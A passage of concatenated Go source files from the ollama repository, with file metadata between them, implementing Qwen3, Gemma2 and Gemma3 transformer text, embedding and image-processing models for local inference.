int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.head_dim", 128)), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), ropeDim: int(c.Uint("rope.dimension_count")), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), eps: c.Float("attention.layer_norm_rms_epsilon"), interleaveLayerStep: int(c.Uint("interleave_moe_layer_step", 1)), noRopeInterval: int(c.Uint("no_rope_interval", 4)), useQKNorm: c.Bool("use_qk_norm", true), attentionTemperatureTuning: c.Bool("attention.temperature_tuning", true), attentionScale: float64(c.Float("attention.scale", 0.1)), attentionFloorScale: float64(c.Float("attention.floor_scale", 8192)), }, } } func (m *TextModel) Forward(ctx ml.Context, inputs, positions, outputs ml.Tensor, batch input.Batch, cache kvcache.Cache) ml.Tensor { hiddenStates := m.TokenEmbedding.Forward(ctx, inputs).Duplicate(ctx) for _, mi := range batch.Multimodal { img := mi.Multimodal[0].Tensor ctx.Forward(img.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), img.Dim(0)*img.Dim(1)))) } var attentionScales ml.Tensor if m.attentionTemperatureTuning { scales := make([]float32, len(batch.Positions)) for i, p := range batch.Positions { scales[i] = float32(math.Log(math.Floor(((float64(p)+1.0)/float64(m.attentionFloorScale))+1.0))*m.attentionScale + 1.0) } attentionScales = ctx.Input().FromFloats(scales, 1, 1, len(scales)) } for i, layer := range m.Layers { cache.SetLayer(i) wc := cache.(*kvcache.WrapperCache) wc.SetLayerType(1) useChunkedAttention := (i+1)%m.noRopeInterval != 0 if useChunkedAttention { wc.SetLayerType(0) } var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, attentionScales, lastLayerOutputs, cache, useChunkedAttention, m.TextOptions) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates) } func (m 
*TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift, m.Layers[layer].Attention.RopeFactors), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3/embed.go
model/models/qwen3/embed.go
package qwen3 import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type embedModel struct { model.Base model.BytePairEncoding *Model poolingType pooling.Type } func (m *embedModel) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates, err := m.forward(ctx, batch) if err != nil { return nil, err } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) return hiddenStates, nil } func newEmbed(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) for i := range layers { layers[i].MLP = &dense{} } m := embedModel{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), Model: &Model{ Layers: layers, Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.freq_scale", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), }, }, poolingType: pooling.Type(c.Uint("pooling_type")), 
} m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3/model.go
model/models/qwen3/model.go
package qwen3 import ( "cmp" "math" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int eps, ropeBase, ropeScale float32 ropeType string originalContextLength int numExperts, numExpertsUsed int normTopKProb bool } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { opts := []func(*rope.Options){rope.WithTypeNeoX()} if o.ropeType == "yarn" { attnFactor := float32(1.0 / (1.0 + 0.1*math.Log(float64(o.ropeScale)))) opts = append(opts, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), rope.WithAttentionFactor(attnFactor), ) } return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1./o.ropeScale, opts...) 
} type Attention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) query = sa.QueryNorm.Forward(ctx, query, opts.eps) key = sa.KeyNorm.Forward(ctx, key, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return sa.Output.Forward(ctx, attention) } type MLP interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := mlp.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, 
selectedExperts) if opts.normTopKProb { routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) routingWeights = routingWeights.Div(ctx, routingWeights.SumRows(ctx)) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates, selectedExperts)) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates). 
SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` *Attention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP } func (d *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type Model struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Layers []Layer `gguf:"blk"` *Options } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates, err := m.forward(ctx, batch) if err != nil { return nil, err } return m.Output.Forward(ctx, hiddenStates), nil } // Forward implements model.Model. 
func (m *Model) forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { if m.Cache != nil { m.Cache.SetLayer(i) } var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) } return m.OutputNorm.Forward(ctx, hiddenStates, m.eps), nil } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift), nil } var _ model.Model = (*Model)(nil) func New(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) for i := range layers { if strings.HasSuffix(c.String("general.architecture"), "moe") { layers[i].MLP = &sparse{} } else { layers[i].MLP = &dense{} } } m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), Layers: layers, Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeType: c.String("rope.scaling.type"), ropeBase: c.Float("rope.freq_base"), ropeScale: 
c.Float("rope.scaling.factor", 1), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } func init() { model.Register("qwen3", New) model.Register("qwen3moe", New) model.Register("qwen3_embed", newEmbed) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma2/model.go
model/models/gemma2/model.go
package gemma2 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads int attnKeyLen, attnValLen int eps, ropeBase, ropeScale float32 attnLogitSoftcap float32 finalLogitSoftcap float32 largeModelScaling bool } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.attnKeyLen, o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX()) } type Model struct { model.Base model.SentencePiece TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` // just set to token_embd? *Options } const ( gemma27BLayerCount = 46 ) func New(c fs.Config) (model.Model, error) { m := Model{ SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), Layers: make([]Layer, c.Uint("block_count")), Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), attnKeyLen: int(c.Uint("attention.key_length")), attnValLen: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 10000.0), ropeScale: c.Float("rope.scaling.factor", 1.0), attnLogitSoftcap: 
c.Float("attn_logit_softcapping"), finalLogitSoftcap: c.Float("final_logit_softcapping"), }, } slidingWindowLen := int32(c.Uint("attention.sliding_window")) m.Cache = kvcache.NewWrapperCache(kvcache.NewSWACache(slidingWindowLen, m.Shift), kvcache.NewCausalCache(m.Shift)) m.Cache.SetConfig(ml.CacheConfig{}) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenState.Dim(1) q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, opts.attnKeyLen, opts.numHeads, batchSize) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs) if opts.largeModelScaling { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.hiddenSize/opts.numHeads))) } else { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.attnKeyLen))) } k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, opts.attnKeyLen, opts.numKVHeads, batchSize) k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, opts.attnValLen, opts.numKVHeads, batchSize) cache.Put(ctx, k, v) k, v, mask := cache.Get(ctx) q = q.Permute(ctx, 0, 2, 1, 3) k = k.Permute(ctx, 0, 2, 1, 3) v = v.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) kq := k.Mulmat(ctx, q) // logit softcap kq = kq.Scale(ctx, 1.0/float64(opts.attnLogitSoftcap)) kq = kq.Tanh(ctx) kq = kq.Scale(ctx, float64(opts.attnLogitSoftcap)) kq = kq.Add(ctx, mask) kq = kq.Softmax(ctx) kqv := v.Mulmat(ctx, kq) kqv = kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) kqv = kqv.Reshape(ctx, opts.attnValLen*opts.numHeads, batchSize) return sa.Output.Forward(ctx, kqv) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type MLP struct { Up *nn.Linear 
`gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *Options) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).GELU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, cache, opts) hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, opts.eps) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. 
if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) hiddenState = l.PostMLPNorm.Forward(ctx, hiddenState, opts.eps) return hiddenState.Add(ctx, residual) } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenState = hiddenState.Scale(ctx, math.Sqrt(float64(m.Options.hiddenSize))) if len(m.Layers) == gemma27BLayerCount { m.Options.largeModelScaling = true } for i, layer := range m.Layers { cacheType := i % 2 m.Cache.SetLayer(i) wc := m.Cache.(*kvcache.WrapperCache) wc.SetLayerType(cacheType) var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, lastLayerOutputs, m.Cache, m.Options) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) hiddenState = m.Output.Forward(ctx, hiddenState) // final logit softcap hiddenState = hiddenState.Scale(ctx, 1.0/float64(m.Options.finalLogitSoftcap)) hiddenState = hiddenState.Tanh(ctx) return hiddenState.Scale(ctx, float64(m.Options.finalLogitSoftcap)), nil } func init() { model.Register("gemma2", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/embed.go
model/models/gemma3/embed.go
package gemma3 import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type embedModel struct { model.Base model.SentencePiece *TextModel poolingType pooling.Type Dense [2]*nn.Linear `gguf:"dense"` } func (m *embedModel) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TextModel.Forward(ctx, batch, m.Cache) hiddenStates = m.poolingType.Forward(ctx, hiddenStates) for _, dense := range m.Dense { hiddenStates = dense.Forward(ctx, hiddenStates) } hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) return hiddenStates, nil } func newEmbedModel(c fs.Config) (model.Model, error) { m := &embedModel{ SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{ int32(c.Uint("tokenizer.ggml.eos_token_id")), int32(c.Uint("tokenizer.ggml.eot_token_id", 106)), }, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), TextModel: newTextModel(c), poolingType: pooling.Type(c.Uint("pooling_type", 0)), } return m, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/process_image.go
model/models/gemma3/process_image.go
package gemma3 import ( "image" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type ImageProcessor struct { imageSize, patchSize, numChannels int } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), numChannels: int(c.Uint("vision.num_channels")), } } func (p *ImageProcessor) pack(img image.Image, mean, std [3]float32) []float32 { var pixelVals, rVals, gVals, bVals []float32 bounds := img.Bounds() for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := img.At(x, y) r, g, b, _ := c.RGBA() rVal := float32(r>>8) / 255.0 gVal := float32(g>>8) / 255.0 bVal := float32(b>>8) / 255.0 rVal = (rVal - mean[0]) / std[0] gVal = (gVal - mean[1]) / std[1] bVal = (bVal - mean[2]) / std[2] rVals = append(rVals, rVal) gVals = append(gVals, gVal) bVals = append(bVals, bVal) } } pixelVals = append(pixelVals, rVals...) pixelVals = append(pixelVals, gVals...) pixelVals = append(pixelVals, bVals...) return pixelVals } func (p ImageProcessor) ProcessImage(img image.Image) ([]float32, error) { outputSize := image.Point{p.imageSize, p.imageSize} newImage := imageproc.Composite(img) newImage = imageproc.Resize(newImage, outputSize, imageproc.ResizeBilinear) data := p.pack(newImage, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD) return data, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model.go
model/models/gemma3/model.go
package gemma3 import ( "bytes" "image" "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor *VisionModel `gguf:"v"` *TextModel *MultiModalProjector `gguf:"mm"` ImageProcessor } var _ model.MultimodalProcessor = (*Model)(nil) type MultiModalProjector struct { SoftEmbNorm *nn.RMSNorm `gguf:"mm_soft_emb_norm"` InputProjection *nn.Linear `gguf:"mm_input_projection"` tokensPerImage int } func (p *MultiModalProjector) Forward(ctx ml.Context, visionOutputs ml.Tensor, imageSize, patchSize int, eps float32) ml.Tensor { l := visionOutputs.Dim(0) visionOutputs = visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) patchesPerImage := imageSize / patchSize visionOutputs = visionOutputs.Reshape(ctx, patchesPerImage, patchesPerImage, l) kernelSize := patchesPerImage / int(math.Sqrt(float64(p.tokensPerImage))) visionOutputs = visionOutputs.AvgPool2D(ctx, kernelSize, kernelSize, 0) visionOutputs = visionOutputs.Reshape(ctx, visionOutputs.Dim(0)*visionOutputs.Dim(1), l) visionOutputs = visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) visionOutputs = p.SoftEmbNorm.Forward(ctx, visionOutputs, eps) // TODO: inputProjection must be transposed since they're incompatible with visionOutputs visionOutputs = p.InputProjection.Weight.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx).Mulmat(ctx, visionOutputs) return visionOutputs } func New(c fs.Config) (model.Model, error) { vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{ 
int32(c.Uint("tokenizer.ggml.eos_token_id")), }, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } var processor model.TextProcessor switch c.String("tokenizer.ggml.model") { case "gpt2": processor = model.NewBytePairEncoding(&vocabulary) default: // Previous uploads of Gemma 3 on Ollama did not have token 106 // (i.e. "<end_of_turn>") so we need to add in case it's not already present vocabulary.EOS = append(vocabulary.EOS, int32(c.Uint("tokenizer.ggml.eot_token_id", 106))) processor = model.NewSentencePiece(&vocabulary) } m := Model{ TextProcessor: processor, ImageProcessor: newImageProcessor(c), VisionModel: newVisionModel(c), TextModel: newTextModel(c), MultiModalProjector: &MultiModalProjector{ tokensPerImage: int(c.Uint("mm_tokens_per_image", 256)), }, } slidingWindowLen := int32(c.Uint("attention.sliding_window")) m.Cache = kvcache.NewWrapperCache(kvcache.NewSWACache(slidingWindowLen, m.Shift), kvcache.NewCausalCache(m.Shift)) return &m, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } image, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } f32s, err := m.ImageProcessor.ProcessImage(image) if err != nil { return nil, err } pixelValues := ctx.Input().FromFloats(f32s, m.ImageProcessor.imageSize, m.ImageProcessor.imageSize, m.ImageProcessor.numChannels, ) visionOutputs := m.VisionModel.Forward(ctx, pixelValues) visionOutputs = m.MultiModalProjector.Forward(ctx, visionOutputs, m.imageSize, m.patchSize, m.VisionModel.eps) return []input.Multimodal{{Tensor: visionOutputs}}, nil } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { var result []*input.Input for _, inp := range inputs { if len(inp.Multimodal) == 0 { result = append(result, inp) } else { inputMultimodal := inp.Multimodal[0].Tensor result = append(result, &input.Input{Token: 108, SameBatch: 
inputMultimodal.Dim(1) + 3}, // "\n\n" &input.Input{Token: 255999}, // "<start_of_image>"" &input.Input{Multimodal: []input.Multimodal{{Tensor: inputMultimodal}}, MultimodalHash: inp.MultimodalHash}, // image data is on the first placeholder ) // add image token placeholders result = append(result, slices.Repeat([]*input.Input{{Token: 0}}, inputMultimodal.Dim(1)-1)...) result = append(result, &input.Input{Token: 256000}, // <end_of_image> &input.Input{Token: 108}, // "\n\n" ) } } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenState := m.TextModel.Forward(ctx, batch, m.Cache) hiddenState = m.Output.Forward(ctx, hiddenState) if m.TextConfig.finalLogitSoftcap > 0.0 { hiddenState = hiddenState.Scale(ctx, 1.0/float64(m.TextConfig.finalLogitSoftcap)) hiddenState = hiddenState.Tanh(ctx) hiddenState = hiddenState.Scale(ctx, float64(m.TextConfig.finalLogitSoftcap)) } return hiddenState, nil } func init() { model.Register("gemma3", New) model.Register("gemma3_embed", newEmbedModel) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model_vision.go
model/models/gemma3/model_vision.go
